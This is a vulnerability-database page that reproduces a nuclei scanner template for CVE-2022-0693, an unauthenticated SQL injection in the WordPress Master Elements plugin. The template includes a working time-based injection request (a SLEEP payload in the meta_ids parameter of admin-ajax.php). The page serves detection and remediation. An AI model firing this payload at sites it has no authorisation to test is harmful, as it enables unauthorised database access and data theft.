Lucene search
K

WordPress Master Elements <=8.0 - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

WordPress Master Elements <=8.0 - SQL Injection vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0693
25 Apr 202216:16
attackerkb
CNNVD
WordPress plugin Master Elements SQL注入漏洞
25 Apr 202200:00
cnnvd
CNVD
WordPress plugin Master Elements SQL injection vulnerability
27 Apr 202200:00
cnvd
CVE
CVE-2022-0693
25 Apr 202215:51
cve
Cvelist
CVE-2022-0693 Master Elements <= 8.0 - Unauthenticated SQLi
25 Apr 202215:51
cvelist
NVD
CVE-2022-0693
25 Apr 202216:16
nvd
OSV
CVE-2022-0693
25 Apr 202216:16
osv
Patchstack
WordPress Master Elements plugin <= 8.0 - Unauthenticated SQL Injection (SQLi) vulnerability
29 Mar 202200:00
patchstack
Prion
Sql injection
25 Apr 202216:16
prion
RedhatCVE
CVE-2022-0693
22 May 202523:27
redhatcve
Rows per page
id: CVE-2022-0693

info:
  name: WordPress Master Elements <=8.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Update to the latest version of WordPress Master Elements plugin (>=8.1) to mitigate the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/a72bf075-fd4b-4aa5-b4a4-5f62a0620643
    - https://wordpress.org/plugins/master-elements
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0693
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0693
    cwe-id: CWE-89
    epss-score: 0.07184
    epss-percentile: 0.93516
    cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: devbunch
    product: master_elements
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch,vuln

http:
  - raw:
      - |
        @timeout: 10s
        GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "Post Meta Setting Deleted Successfully")'
        condition: and
# digest: 4a0a00473045022100d0737d9b76e66d588cf8647846d98aeefbbbb26bdff590b5aeb0a9a07046d36c02203c76a88822fe06feadd0d3cfc0a70cbbc580d7eba96e6c3781ab8086a8ed881d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.07184
18